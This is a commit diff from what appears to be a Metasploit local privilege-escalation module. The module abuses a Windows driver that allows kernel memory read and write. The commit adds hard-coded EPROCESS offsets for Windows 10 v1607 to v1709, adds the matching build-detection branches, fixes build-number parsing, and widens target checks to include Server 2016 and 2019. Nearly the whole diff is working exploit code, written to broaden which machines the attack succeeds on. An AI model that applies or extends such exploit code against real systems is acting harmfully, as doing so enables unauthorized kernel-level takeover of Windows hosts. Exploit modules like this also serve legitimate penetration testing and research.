Add and test even more targets
This commit is contained in:
parent
eb89550f85
commit
d990e884af
Binary file not shown.
|
@ -7,7 +7,9 @@ read and write kernel-mode memory.
|
|||
* Windows 7 SP0 x64
|
||||
* Windows 7 SP1 x64
|
||||
* Windows 8.1 x64
|
||||
* Windows 10 x64 v1803 - 20H2
|
||||
* Windows 10 x64 v1607 - v2009 (20H2)
|
||||
* Windows Server 2016 x64
|
||||
* Windows Server 2019 x64
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
|
|
@ -45,6 +45,15 @@ BOOL ResolveRequirements(void) {
|
|||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
|
|
|
@ -43,6 +43,12 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp0 = { 0x188, 0x208, 0x180 };
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp1 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 8.1 (6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
||||
/* Windows 10 v1607 (10.0.14393) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1607%20Redstone%201%20(Anniversary%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
|
||||
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
|
||||
|
|
|
@ -82,12 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
def target_compatible?
|
||||
sysinfo_value = sysinfo['OS']
|
||||
|
||||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
|
||||
vprint_status("Windows Build Number = #{build_num}")
|
||||
|
||||
return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
|
||||
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 17134 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)
|
||||
|
||||
false
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue